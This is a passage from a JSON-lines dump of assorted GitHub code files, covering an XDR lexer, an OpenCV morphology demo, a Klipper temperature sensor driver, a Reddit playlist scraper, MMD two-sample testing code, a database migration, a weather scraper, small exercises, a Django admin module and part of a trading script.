reader):\n c = reader.peek()\n return c is None or not c.isspace()\n\n\nclass XDRLexer:\n def __init__(self, fp):\n self.reader = XDRReader(fp)\n self.lookahead = []\n\n def _token(self):\n tokenTypes = [\n XDRTokenComment,\n XDRTokenIdentifier,\n XDRTokenCEscape,\n XDRTokenPunctuation,\n XDRTokenConstant,\n XDRTokenSpace,\n ]\n while True:\n if self.reader.peek() is None:\n return None\n\n for tokenType in tokenTypes:\n if tokenType.start(self.reader):\n ret = tokenType.consume(self.reader)\n if type(ret) not in [XDRTokenSpace, XDRTokenComment]:\n return ret\n\n def next(self):\n if len(self.lookahead) > 0:\n token = self.lookahead[0]\n self.lookahead = self.lookahead[1:]\n return token\n return self._token()\n\n def peek(self):\n if len(self.lookahead) == 0:\n token = self._token()\n if token is None:\n return None\n self.lookahead.append(token)\n return self.lookahead[0]\n","repo_name":"libvirt/libvirt","sub_path":"scripts/rpcgen/rpcgen/lexer.py","file_name":"lexer.py","file_ext":"py","file_size_in_byte":5336,"program_lang":"python","lang":"en","doc_type":"code","stars":1243,"dataset":"github-code","pt":"19"}
+{"seq_id":"11332346279","text":"#Import Libraries\nimport cv2\nimport numpy as np\n\nimg = cv2.imread('assets/bug1.png',0)\nimg = cv2.resize(img,(400,400))\nimg = cv2.bitwise_not(img)\ncv2.imshow('Original',img)\n\n#define the kernal\nkernal = np.ones((3,3),np.uint8)\n\n#erosion of the image ie.removes pixels on object boundaries \nerosion = cv2.erode(img,kernal,iterations = 9)\ncv2.imshow('erosion method',erosion)\n\n#Dilation adds pixels to the boundaries of objects in an image\ndilation = cv2.dilate(img,kernal,iterations = 9)\ncv2.imshow('Dilation',dilation)\n\n\n\n\nopening = cv2.morphologyEx(img,cv2.MORPH_OPEN,kernal,iterations = 9)\ncv2.imshow('Opening',opening)\n\n#The closing operation dilates an image and then erodes the dilated image \nclosing = cv2.morphologyEx(img,cv2.MORPH_CLOSE,kernal,iterations = 9)\ncv2.imshow('Closing',closing)\n\n\n\n\n\ncv2.waitKey(0)\ncv2.destroyAllWindows()","repo_name":"Jem1D/DIP-codes","sub_path":"exp10_morph.py","file_name":"exp10_morph.py","file_ext":"py","file_size_in_byte":840,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"23948115333","text":"import logging\nfrom . import bus\n\nLM75_CHIP_ADDR = 0x48\nLM75_I2C_SPEED = 100000\nLM75_REGS = {\n 'TEMP' : 0x00,\n 'CONF' : 0x01,\n 'THYST' : 0x02,\n 'TOS' : 0x03,\n 'PRODID' : 0x07 # TI LM75A chips only?\n}\nLM75_REPORT_TIME = .8\n# Temperature can be sampled at any time but the read aborts\n# the current conversion. Conversion time is 300ms so make\n# sure not to read too often.\nLM75_MIN_REPORT_TIME = .5\n\nclass LM75:\n def __init__(self, config):\n self.printer = config.get_printer()\n self.name = config.get_name().split()[-1]\n self.reactor = self.printer.get_reactor()\n self.i2c = bus.MCU_I2C_from_config(config, LM75_CHIP_ADDR,\n LM75_I2C_SPEED)\n self.mcu = self.i2c.get_mcu()\n self.report_time = config.getfloat('lm75_report_time', LM75_REPORT_TIME,\n minval=LM75_MIN_REPORT_TIME)\n self.temp = self.min_temp = self.max_temp = 0.0\n self.sample_timer = self.reactor.register_timer(self._sample_lm75)\n self.printer.add_object(\"lm75 \" + self.name, self)\n self.printer.register_event_handler(\"klippy:connect\",\n self.handle_connect)\n\n def handle_connect(self):\n self._init_lm75()\n self.reactor.update_timer(self.sample_timer, self.reactor.NOW)\n\n def setup_minmax(self, min_temp, max_temp):\n self.min_temp = min_temp\n self.max_temp = max_temp\n\n def setup_callback(self, cb):\n self._callback = cb\n\n def get_report_time_delta(self):\n return self.report_time\n\n def degrees_from_sample(self, x):\n # The temp sample is encoded in the top 9 bits of a 16-bit\n # value. Resolution is 0.5 degrees C.\n return x[0] + (x[1] >> 7) * 0.5\n\n def _init_lm75(self):\n # Check and report the chip ID but ignore errors since many\n # chips don't have it\n try:\n prodid = self.read_register('PRODID', 1)[0]\n logging.info(\"lm75: Chip ID %#x\" % prodid)\n except:\n pass\n\n def _sample_lm75(self, eventtime):\n try:\n sample = self.read_register('TEMP', 2)\n self.temp = self.degrees_from_sample(sample)\n except Exception:\n logging.exception(\"lm75: Error reading data\")\n self.temp = 0.0\n return self.reactor.NEVER\n\n if self.temp < self.min_temp or self.temp > self.max_temp:\n self.printer.invoke_shutdown(\n \"LM75 temperature %0.1f outside range of %0.1f:%.01f\"\n % (self.temp, self.min_temp, self.max_temp))\n\n measured_time = self.reactor.monotonic()\n self._callback(self.mcu.estimated_print_time(measured_time), self.temp)\n return measured_time + self.report_time\n\n def read_register(self, reg_name, read_len):\n # read a single register\n regs = [LM75_REGS[reg_name]]\n params = self.i2c.i2c_read(regs, read_len)\n return bytearray(params['response'])\n\n def write_register(self, reg_name, data):\n if type(data) is not list:\n data = [data]\n reg = LM75_REGS[reg_name]\n data.insert(0, reg)\n self.i2c.i2c_write(data)\n\n def get_status(self, eventtime):\n return {\n 'temperature': round(self.temp, 2),\n }\n\n\ndef load_config(config):\n # Register sensor\n pheaters = config.get_printer().load_object(config, \"heaters\")\n pheaters.add_sensor_factory(\"LM75\", LM75)\n","repo_name":"Klipper3d/klipper","sub_path":"klippy/extras/lm75.py","file_name":"lm75.py","file_ext":"py","file_size_in_byte":3521,"program_lang":"python","lang":"en","doc_type":"code","stars":7817,"dataset":"github-code","pt":"19"}
+{"seq_id":"19653990319","text":"from flask import Blueprint\nfrom flask import flash\nfrom flask import g\nfrom flask import redirect\nfrom flask import render_template\nfrom flask import request\nfrom flask import url_for\nfrom werkzeug.exceptions import abort\nimport praw\nfrom praw.models import MoreComments\nfrom google.cloud import language\nfrom google.cloud.language import enums\nfrom google.cloud.language import types\nfrom gmusicapi import Mobileclient\nfrom uuid import getnode as getmac\nfrom scrapper.google_config import g_music\nimport os\n\nimport re\n\nreddit_app_id = os.getenv(\"SCRAPPER_REDDIT_ID\")\nreddit_app_secret = os.getenv(\"SCRAPPER_REDDIT_SECRET\")\nreddit = praw.Reddit(user_agent=\"Comment Extraction\",\n client_id=reddit_app_id, client_secret=reddit_app_secret)\n\nclient = language.LanguageServiceClient()\n\nbp = Blueprint(\"reddit\", __name__)\n\n\n@bp.route(\"/\", methods=(\"GET\", \"POST\"))\ndef index():\n song_match_regexp = r\"^(.*)\\s(by|-)([A-Za-z\\t ]+)+\"\n \"\"\"Scrape a reddit post.\"\"\"\n if request.method == \"POST\":\n url = request.form[\"url\"]\n playlist = request.form[\"playlist\"]\n error = None\n \n\n if not url:\n error = \"URL is required.\"\n if not playlist:\n playlist = \"Songs from Reddit \" + url\n if error is not None:\n flash(error)\n else:\n print(\"Parsing the following URL: \" + url) \n \n song_ids = []\n submission = reddit.submission(url=url)\n songs = []\n submission.comment_sort = \"top\"\n submission.comments.replace_more(limit=1)\n exclude_words = [\"SONG\", \"COMMENT\", \"ICON\", \"COMMENTS\", \"SONGS\", \"ICONS\", \"ALBUM\", \"ALBUMS\"]\n print(\"Fetching top comments\")\n for top_level_comment in submission.comments:\n # We only want short-ish replies as we're looking for songs and not meta or chatter\n if len(top_level_comment.body) < 150: \n cleaned_comment = clean(top_level_comment.body)\n if re.match(song_match_regexp, cleaned_comment, re.IGNORECASE):\n song_match = re.match(song_match_regexp, cleaned_comment)\n song_to_search = song_match.group(1) + \" \" + song_match.group(2) + \" \" + song_match.group(3)\n songs.append(song_to_search)\n else:\n print(\"Extracting entities\")\n document = types.Document(\n content=cleaned_comment,\n type=enums.Document.Type.PLAIN_TEXT) \n # Extract entities of the comments\n entities = client.analyze_entities(document=document).entities\n # If the entity is either work of art or a person, append it to the list.\n song_and_artist = []\n for entity in entities: \n # entity type number 5 is WORK_OF_ART \n if (entity.type == 5 and entity.name.upper() not in exclude_words) or entity.type == 1:\n song_and_artist.append(entity.name)\n if len(song_and_artist) > 0:\n songs.append(\" - \".join(song_and_artist))\n\n print(\"Matching songs with Google play music\")\n for song in songs: \n search_result = g_music.search(song, max_results=20) \n print(\"Searching for \" + song)\n if(\"song_hits\" in search_result):\n if len(search_result[\"song_hits\"]) > 0:\n song_id = search_result[\"song_hits\"][0][\"track\"][\"storeId\"]; \n song_ids.append(song_id) \n \n print(\"Creating playist: \" + playlist)\n playist_id = g_music.create_playlist(playlist, \"\", True)\n print(\"adding songs to playlist\" + playist_id )\n g_music.add_songs_to_playlist(playist_id, song_ids) \n return render_template(\"reddit/index.html\", posts=songs, google_auth = g_music.is_authenticated())\n\n return render_template(\"reddit/index.html\", google_auth = g_music.is_authenticated())\n\ndef clean(comment):\n comment = 
re.sub(r'https?:\\/\\/.*[\\r\\n]*', '', comment, flags=re.MULTILINE)\n comment = comment.replace(\"[\", \"\").replace(\"(\", \"\").replace(\"]\", \"\").replace(\")\", \"\")\n return comment\n\n","repo_name":"jeremy-albuixech/scrapper","sub_path":"reddit.py","file_name":"reddit.py","file_ext":"py","file_size_in_byte":4520,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"11857684544","text":"import glob\nimport numpy\nimport CNNTransform\n\nresnet = CNNTransform.resnet18()\n\ndef dist_prob(a, x):\n d = numpy.exp(((a - x)**2).sum(1))\n return d / d.sum()\n\nclass DeepMatch():\n def __init__(self, vector_dir=\"vectors\"):\n files = glob.glob(vector_dir + \"/*.csv\")\n labels = []\n V = []\n\n for f in files:\n print(\"Loading: \", f)\n labels.append(f.split(\"/\")[-1].split(\".\")[0])\n V.append(numpy.loadtxt(f, delimiter=\",\"))\n\n self.V = numpy.vstack(V)\n self.labels = numpy.hstack(labels)\n\n def predict(self, X):\n T = resnet.transform(X)\n\n # similarity\n D = [dist_prob(self.V, x).ravel() for x in T.detach().numpy()]\n\n p = []\n for d in D:\n idx = d.argsort()[:5]\n p.append(dict(zip(self.labels[idx], d[idx].tolist())))\n print(p)\n return p\n\n\nif __name__ == '__main__':\n from optparse import OptionParser\n\n parser = OptionParser()\n parser.add_option(\"-i\", \"--image\", dest=\"image\",\n help=\"Path to image\")\n","repo_name":"radolalaina/deeplearning","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1078,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"}
+{"seq_id":"38345208009","text":"# File: Untrained CNN\r\n# Description: This program allows the user to train and save a new CNN.\r\n# Institution: University of Texas at Austin, Department of Biomedical Engineering\r\n# Developer: Shao-Po (Shawn) Huang\r\n# Team Members: Bryce Carr, Ajay Gadwal, Ethan Muyskens, Christian Schonhoeft\r\n\r\n# Date Last Modified: 05/11/20\r\n\r\n# This program uses keras and joblib.\r\n\r\nfrom keras.models import Sequential\r\nfrom keras.layers import Dense\r\nfrom keras.layers import Flatten\r\nfrom keras.layers import Dropout\r\nfrom keras.layers.convolutional import Conv1D\r\nfrom keras.layers.convolutional import MaxPooling1D\r\nfrom keras.utils import to_categorical\r\nimport joblib\r\n\r\n# Helpful resource for building convolutional neural network:\r\n# https://machinelearningmastery.com/cnn-models-for-human-activity-recognition-time-series-classification/\r\n\r\n# Documentation for keras:\r\n# https://keras.io/\r\n\r\n# Source for CNN design:\r\n# Yildirim O, Baloglu UB, Acharya UR. A Deep Learning Model for Automated Sleep Stages Classification Using PSG Signals.\r\n# Int J Environ Res Public Health. 2019;16(4):599. Published 2019 Feb 19. doi:10.3390/ijerph16040599\r\n\r\n# Build the CNN\r\nn_timesteps, n_features, n_outputs = trainX.shape[1], trainX.shape[2], trainy.shape[1]\r\nmodel = Sequential()\r\nmodel.add(Conv1D(filters=64, kernel_size=5, strides=3, activation='relu', input_shape=(n_timesteps,n_features)))\r\nmodel.add(Conv1D(filters=128, kernel_size=5, strides=1, activation='relu'))\r\nmodel.add(MaxPooling1D(pool_size=2, strides=2))\r\nmodel.add(Dropout(0.2))\r\nmodel.add(Conv1D(filters=128, kernel_size=13, strides=1, activation='relu'))\r\nmodel.add(Conv1D(filters=256, kernel_size=7, strides=1, activation='relu'))\r\nmodel.add(MaxPooling1D(pool_size=2, strides=2))\r\nmodel.add(Conv1D(filters=256, kernel_size=7, strides=1, activation='relu'))\r\nmodel.add(Conv1D(filters=64, kernel_size=4, strides=1, activation='relu')) \r\nmodel.add(MaxPooling1D(pool_size=2, strides=2))\r\nmodel.add(Conv1D(filters=32, kernel_size=3, strides=1, activation='relu'))\r\nmodel.add(Conv1D(filters=64, kernel_size=6, strides=1, activation='relu'))\r\nmodel.add(MaxPooling1D(pool_size=2, strides=2))\r\nmodel.add(Conv1D(filters=8, kernel_size=5, strides=1, activation='relu'))\r\nmodel.add(Conv1D(filters=8, kernel_size=2, strides=1, activation='relu'))\r\nmodel.add(MaxPooling1D(pool_size=2, strides=2))\r\nmodel.add(Flatten())\r\nmodel.add(Dense(64, activation='relu'))\r\nmodel.add(Dropout(0.2))\r\nmodel.add(Dense(n_outputs, activation='softmax'))\r\nmodel.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy'])\r\n\r\n# Fit the CNN\r\nmodel.fit(trainX, trainy, epochs=100, verbose=2, batch_size=32)\r\n\r\n# Save trained CNN by providing destination\r\njoblib.dump(model,PATH_CNN)\r\n","repo_name":"shawnh871/Sleep_Stage_Classification","sub_path":"Untrained_CNN.py","file_name":"Untrained_CNN.py","file_ext":"py","file_size_in_byte":2732,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"23089104183","text":"\"\"\"add category, message_type and message table\n\nRevision ID: 27ce67ba5f4d\nRevises: 0dbc42ae52bd\nCreate Date: 2020-08-04 20:40:09.626568\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '27ce67ba5f4d'\ndown_revision = '0dbc42ae52bd'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('categories',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('c_name', sa.String(length=50), nullable=False),\n sa.Column('c_descripton', sa.String(length=100), nullable=True),\n sa.Column('c_thumbnail', sa.String(length=50), nullable=True),\n sa.Column('created_at', sa.DateTime(), server_default=sa.text('now()'), nullable=True),\n sa.Column('updated_at', sa.DateTime(), server_default=sa.text('now()'), nullable=True),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_table('message_types',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('t_name', sa.String(length=50), nullable=False),\n sa.Column('t_description', sa.String(length=100), nullable=True),\n sa.Column('created_at', sa.DateTime(), server_default=sa.text('now()'), nullable=True),\n sa.Column('updated_at', sa.DateTime(), server_default=sa.text('now()'), nullable=True),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_table('messages',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('m_title', sa.String(length=100), nullable=True),\n sa.Column('m_description', sa.String(length=200), nullable=True),\n sa.Column('type_id', sa.Integer(), nullable=False),\n sa.Column('m_thumbnail', sa.String(length=100), nullable=True),\n sa.Column('m_link', sa.String(length=200), nullable=True),\n sa.Column('m_duration', sa.String(length=50), nullable=True),\n sa.Column('m_broadcast', sa.Boolean(), nullable=False),\n sa.Column('created_at', sa.DateTime(), server_default=sa.text('now()'), nullable=True),\n sa.Column('updated_at', sa.DateTime(), server_default=sa.text('now()'), nullable=True),\n sa.ForeignKeyConstraint(['type_id'], ['message_types.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_table('messages_categories',\n sa.Column('message_id', sa.Integer(), nullable=False),\n sa.Column('category_id', sa.Integer(), nullable=False),\n sa.ForeignKeyConstraint(['category_id'], ['categories.id'], ),\n sa.ForeignKeyConstraint(['message_id'], ['messages.id'], ),\n sa.PrimaryKeyConstraint('message_id', 'category_id')\n )\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_table('messages_categories')\n op.drop_table('messages')\n op.drop_table('message_types')\n op.drop_table('categories')\n # ### end Alembic commands ###\n","repo_name":"pat64j/dante-backend","sub_path":"migrations/versions/27ce67ba5f4d_add_category_message_type_and_message_.py","file_name":"27ce67ba5f4d_add_category_message_type_and_message_.py","file_ext":"py","file_size_in_byte":2833,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"35851290015","text":"\"\"\"\nThe methods here are taken from Liu et al\nhttps://github.com/fengliu90/DK-for-TST/blob/master/Baselines_Blob.py\n\"\"\"\nfrom sklearn.utils import check_random_state\nfrom argparse import Namespace\nimport argparse\nimport os\nimport numpy as np\nimport torchvision.transforms as transforms\nimport torchvision.transforms.functional as TF\nfrom torch.utils.data import DataLoader\nfrom torchvision import datasets\nfrom torch.autograd import Variable\nimport torch.nn as nn\nimport torch\nimport pickle\nfrom tqdm.auto import tqdm\nfrom utils_HD import MatConvert, MMDu, TST_MMD_u\nfrom mmdvar import IncomMMDVar, ComMMDVar, h1_mean_var_gram\n\n# Setup seeds\nnp.random.seed(1102)\ntorch.manual_seed(1102)\ntorch.cuda.manual_seed(1102)\ntorch.backends.cudnn.deterministic = True\nis_cuda = True\n\ndtype = torch.float\ndevice = torch.device(\"cuda:0\" if torch.cuda.is_available() else 'cpu')\ncuda = True if torch.cuda.is_available() else False\n\n\ndef deep_mmd_not_image(sample_p, sample_q, use_1sample_U, complete, n_epochs=1000):\n assert sample_p.shape[1] == sample_q.shape[1]\n sample_p = np.array(sample_p, dtype='float32')\n sample_q = np.array(sample_q, dtype='float32')\n \n # Setup for all experiments\n alpha = 0.05 # test threshold\n x_in = sample_p.shape[1] # number of neurons in the input layer, i.e., dimension of data\n H = 50 # number of neurons in the hidden layer\n x_out = 50 # number of neurons in the output layer\n learning_rate = 0.0005 # learning rate for MMD-D on Blob\n N_epoch = n_epochs # number of training epochs\n\n # prepare datasets\n sample_p = torch.from_numpy(sample_p)\n sample_q = torch.from_numpy(sample_q)\n \n # split data 50/50\n x_train, x_test = sample_p[:len(sample_p)//2], sample_p[len(sample_p)//2:]\n y_train, y_test = sample_q[:len(sample_q) // 2], sample_q[len(sample_q) // 2:]\n\n # Initialize parameters\n model_u = ModelLatentF(x_in, H, x_out)\n if cuda:\n model_u.cuda()\n epsilonOPT = MatConvert(np.random.rand(1) * (10 ** (-10)), device, dtype)\n epsilonOPT.requires_grad = True\n sigmaOPT = MatConvert(np.sqrt(np.random.rand(1) * 0.3), device, dtype)\n sigmaOPT.requires_grad = True\n sigma0OPT = MatConvert(np.sqrt(np.random.rand(1) * 0.002), device, dtype)\n sigma0OPT.requires_grad = True\n\n # Setup optimizer for training deep kernel\n optimizer_u = torch.optim.Adam(list(model_u.parameters())+[epsilonOPT]+[sigmaOPT]+[sigma0OPT], lr=learning_rate) #\n\n # Train deep kernel to maximize test power\n S = torch.cat([x_train.cpu(), y_train.cpu()], 0).to(device)\n # S = MatConvert(S, device, dtype)\n N1 = len(x_train)\n np.random.seed(seed=1102)\n torch.manual_seed(1102)\n torch.cuda.manual_seed(1102)\n for t in tqdm(range(N_epoch)):\n # Compute epsilon, sigma and sigma_0\n ep = torch.exp(epsilonOPT)/(1+torch.exp(epsilonOPT))\n sigma = sigmaOPT ** 2\n sigma0_u = sigma0OPT ** 2\n # Compute output of the deep network\n modelu_output = model_u(S)\n # Compute J (STAT_u)\n TEMP = MMDu(modelu_output, N1, S, sigma, sigma0_u, ep, use_1sample_U=use_1sample_U, complete=complete)\n mmd_value_temp = -1 * TEMP[0]\n mmd_std_temp = torch.sqrt(TEMP[1]+10**(-6))\n STAT_u = torch.div(mmd_value_temp, mmd_std_temp)\n # Initialize optimizer and Compute gradient\n optimizer_u.zero_grad()\n STAT_u.backward(retain_graph=True)\n # Update weights using gradient descent\n optimizer_u.step()\n\n # Compute test power of deep kernel based MMD\n S = torch.cat([x_test.cpu(), y_test.cpu()], 0).to(device)\n # S = MatConvert(S, device, dtype)\n N1 = len(x_test)\n 
N_per = 500\n alpha = 0.05\n # MMD-D\n dec, pvalue, _ = TST_MMD_u(model_u(S), N_per, N1, S, sigma, sigma0_u, ep, alpha, device, dtype, use_1sample_U=use_1sample_U, complete=complete)\n return dec\n\n\nclass ModelLatentF(torch.nn.Module):\n \"\"\"Latent space for both domains.\"\"\"\n def __init__(self, x_in, H, x_out):\n \"\"\"Init latent features.\"\"\"\n super(ModelLatentF, self).__init__()\n self.restored = False\n self.latent = torch.nn.Sequential(\n torch.nn.Linear(x_in, H, bias=True),\n torch.nn.Softplus(),\n torch.nn.Linear(H, H, bias=True),\n torch.nn.Softplus(),\n torch.nn.Linear(H, H, bias=True),\n torch.nn.Softplus(),\n torch.nn.Linear(H, x_out, bias=True),\n )\n def forward(self, input):\n \"\"\"Forward the LeNet.\"\"\"\n fealant = self.latent(input)\n return fealant","repo_name":"sumahn/c2st","sub_path":"MMD/ts_tests/deep_mmd_not_image.py","file_name":"deep_mmd_not_image.py","file_ext":"py","file_size_in_byte":4561,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"45720450858","text":"import requests\nimport urllib.request\nimport time\nimport csv\nfrom bs4 import BeautifulSoup\nimport sched, time\nfrom datetime import datetime\nfrom yoo_telegram import Notifier\nimport pygsheets\nfrom config import BOT_TOKEN, TELEGRAM_USER\n\n\nclient = Notifier(BOT_TOKEN)\ngc = pygsheets.authorize(\n service_file=\"keys/bratislava-weather-trends-b9b47037fa19.json\"\n)\nSECONDS = 60 * 60\n\n\ndef getData(sc):\n try:\n sh = gc.open(\"weather-data\")\n wks = sh.sheet1\n\n url = \"http://www.shmu.sk/sk/?page=59\"\n response = requests.get(url)\n soup = BeautifulSoup(response.text, \"html.parser\")\n timeNow = datetime.now().strftime(\"%Y/%m/%d %H:%M\")\n for row in soup.findAll(\"table\")[0].find_all(\"tr\"):\n columns = row.find_all(\"td\")\n if columns[0].text not in (\n \"Bratislava - Mlynská Dolina\",\n \"Bratislava Koliba\",\n ):\n continue\n else:\n station = columns[0].text.strip()\n temperature = columns[1].text.strip().split(\" \")[0]\n wind_dir = columns[2].text.strip()\n wind_speed = columns[3].text.strip().split(\" \")[0]\n wind_gusts = columns[4].text.strip()\n pressure = columns[5].text.strip().split(\" \")[0]\n clouds = columns[6].text.strip()\n weather = columns[7].text.strip()\n\n wks.insert_rows(\n 1,\n number=1,\n values=[\n timeNow,\n station,\n temperature,\n wind_dir,\n wind_speed,\n wind_gusts,\n pressure,\n clouds,\n weather,\n ],\n inherit=False,\n )\n sc.enter(SECONDS, 1, getData, (sc,))\n except Exception as e:\n timeErr = datetime.now().strftime(\"%Y/%m/%d %H:%M\")\n e_msg = f\"{timeErr} - Bratislava weather - {str(e)}\"\n client.sendMessage(TELEGRAM_USER, e_msg)\n sc.enter(SECONDS, 1, getData, (sc,))\n\n\ndef main():\n s = sched.scheduler(time.time, time.sleep)\n try:\n s.enter(SECONDS, 1, getData, (s,))\n s.run()\n except Exception as e:\n timeErr = datetime.now().strftime(\"%Y/%m/%d %H:%M\")\n e_msg = f\"{timeErr} - Bratislava weather - {str(e)}\"\n client.sendMessage(TELEGRAM_USER, e_msg)\n \n\nif __name__ == \"__main__\":\n main()\n","repo_name":"williambrach/Bratislava-weather-trends","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2507,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"71807499243","text":"class BasketballPlayer():\n def __init__(self, team, first_name, last_name, height_cm, weight_kg, points, rebounds, assists, triple_doubles):\n self.team = team\n self.first_name = first_name\n self.last_name = last_name\n self.height_cm = height_cm\n self.weight_cm = weight_kg\n self.points = points\n self.rebounds = rebounds\n self.assists = assists\n self.triple_doubles = triple_doubles\n\n\nprint(\"Build your own NBA team with adding your own favorite players!\")\n\nnew_player = BasketballPlayer(\n team=input(\"Enter player team: \"),\n first_name=input(\"First name: \"),\n last_name=input(\"Last name: \"),\n height_cm=input(\"Height in centimeters: \"),\n weight_kg=input(\"Weight in kilograms: \"),\n points=input(\"Points: \"),\n rebounds=input(\"Rebounds: \"),\n assists=input(\"Assists: \"),\n triple_doubles=input(\"Triple doubles: \")\n)\n\nwith open(\"player.txt\", \"w\") as player_file:\n player_file.write(str(new_player.__dict__))\n\nprint(\"Player added!\")","repo_name":"jaxtothemax/PythonHomework_13","sub_path":"Add_Player/player.py","file_name":"player.py","file_ext":"py","file_size_in_byte":1022,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"18856698610","text":"stack = []\n\ndef isEmpty():\n if len(stack) == 0:\n return True\n else:\n return False\n\ndef push(n):\n stack.append(n)\n\ndef pop():\n if isEmpty():\n print(\"Stack is empty.\")\n else:\n stack.pop()\n\ndef display():\n if isEmpty():\n print (\"Stack is empty\")\n else:\n print (stack)\n\nwhile True:\n choice = int (input(\"Make a choice: \"))\n if choice == 1:\n num = int(input(\"Enter an element to be input in the stack: \"))\n push(num)\n elif choice == 2:\n pop()\n elif choice == 3:\n display()","repo_name":"Advaitmenon1106/backup","sub_path":"Py/Data Structures in Python/stack.py","file_name":"stack.py","file_ext":"py","file_size_in_byte":570,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"14476275797","text":"# -*- coding: utf-8 -*-\n\nfrom django.utils.translation import ugettext_lazy as _\nfrom django.template.response import TemplateResponse\nfrom django.core.urlresolvers import reverse\nfrom django.conf.urls import patterns, url\nfrom django.shortcuts import redirect\nfrom django.contrib import admin\nfrom dbsnapshot import models\n\n\nclass ServerAdmin(admin.ModelAdmin):\n list_display = (\n 'host', 'port', 'status', 'remote_status', 'remote_list_num',\n 'days', 'per_day', 'created', 'updated', 'actions_column', 'id',)\n search_fields = ('host',)\n list_filter = ('status', 'created', 'updated',)\n\n def __init__(self, *args, **kwargs):\n super(ServerAdmin, self).__init__(*args, **kwargs)\n self._col_inst = None\n\n def _get_link(self, title, view_name):\n return '[%s] ' % (\n reverse('admin:%s' % view_name, args=(self._col_inst.pk,),\n current_app=self.admin_site.name),\n unicode(title)\n )\n\n def actions_column(self, instance, actions=''):\n self._col_inst = instance\n actions += self._get_link(_('backup'), 'backup_view')\n actions += self._get_link(_('clean'), 'clean_view')\n actions += self._get_link(_('list of backups'), 'backup_list')\n return actions\n\n actions_column.short_description = _('Actions')\n actions_column.allow_tags = True\n\n def _server_view(self, request, pk, template, extra_context=None):\n context = {\n 'server': models.Server.objects.get(pk=pk),\n 'app_label': models.Server._meta.app_label,\n 'verbose_name': unicode(models.Server._meta.verbose_name),\n }\n if extra_context is not None:\n context.update(extra_context)\n return TemplateResponse(\n request, 'dbsnapshot/admin/%s.html' % template, context,\n current_app=self.admin_site.name)\n\n def backup_view(self, request, pk):\n return self._server_view(request, pk, 'backup_view')\n\n def clean_view(self, request, pk):\n return self._server_view(request, pk, 'clean_view')\n\n def backup_list_view(self, request, pk):\n return self._server_view(request, pk, 'backup_list')\n\n def backup_delete_view(self, request, pk, filename):\n models.Server.objects.get(pk=pk).remote_delete(filename)\n return redirect(\n reverse(\n 'admin:backup_list', args=(pk,),\n current_app=self.admin_site.name\n )\n )\n\n def get_urls(self):\n urls = super(ServerAdmin, self).get_urls()\n\n admin_urls = patterns(\n '',\n url(\n r'^backup/(\\d+)/$',\n self.admin_site.admin_view(self.backup_view),\n name='backup_view'\n ),\n url(\n r'^backup/clean/(\\d+)/$',\n self.admin_site.admin_view(self.clean_view),\n name='clean_view'\n ),\n url(\n r'^backup/list/(\\d+)/$',\n self.admin_site.admin_view(self.backup_list_view),\n name='backup_list'\n ),\n url(\n r'^backup/delete/(\\d+)/(.*?)/$',\n self.admin_site.admin_view(self.backup_delete_view),\n name='backup_delete'\n ),\n )\n return admin_urls + urls\n\n\nclass BackupLogAdmin(admin.ModelAdmin):\n list_display = (\n 'server', 'method', 'start', 'end', 'elapsed',\n 'success', 'date', 'id',)\n date_hierarchy = 'date'\n search_fields = ('server__host',)\n list_filter = ('method', 'success', 'date',)\n\n def __init__(self, model, admin_site):\n super(BackupLogAdmin, self).__init__(model, admin_site)\n\n self.readonly_fields = [field.name for field in model._meta.fields]\n self.readonly_model = model\n\n def has_add_permission(self, request):\n return False\n\n def has_delete_permission(self, request, obj=None):\n return False\n\n def has_change_permission(self, request, obj=None):\n return request.method != 'POST'\n\n\nadmin.site.register(models.Server, 
ServerAdmin)\nadmin.site.register(models.Log, BackupLogAdmin)\n","repo_name":"LPgenerator/django-db-snapshot","sub_path":"dbsnapshot/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":4187,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"19"}
+{"seq_id":"25417100294","text":"from angel_api import Angel\nimport datetime\nimport time\nimport os\nfrom django.core.wsgi import get_wsgi_application\nos.environ['DJANGO_SETTINGS_MODULE'] = 'TradeXpress.settings'\napplication = get_wsgi_application()\nfrom Intellitrade.models import *\n\ndef trail_sl(entry_price, ltp, sl, trade):\n if ltp >= entry_price + sl or trade.sl_to_entry:\n if not trade.sl_to_entry:\n trade.sl_to_entry = True\n trade.save()\n sl = 0\n return sl\n\ndef exitOrder():\n try:\n active_trades = TradeSignal.objects.filter(is_active=True)\n active_users = Trader.objects.filter(is_active=True)\n if active_users is not None and len(active_users) > 0:\n angel = Angel(active_users[0].email)\n if active_trades is not None and len(active_trades)>0:\n for trade in active_trades:\n symbol_token = trade.symbol_token\n ltp = angel.getLtp(symbol_token)\n entry_price = trade.entry_price\n sl = StopLoss.objects.get(nifty_symbol=trade.nifty_symbol).price\n target = 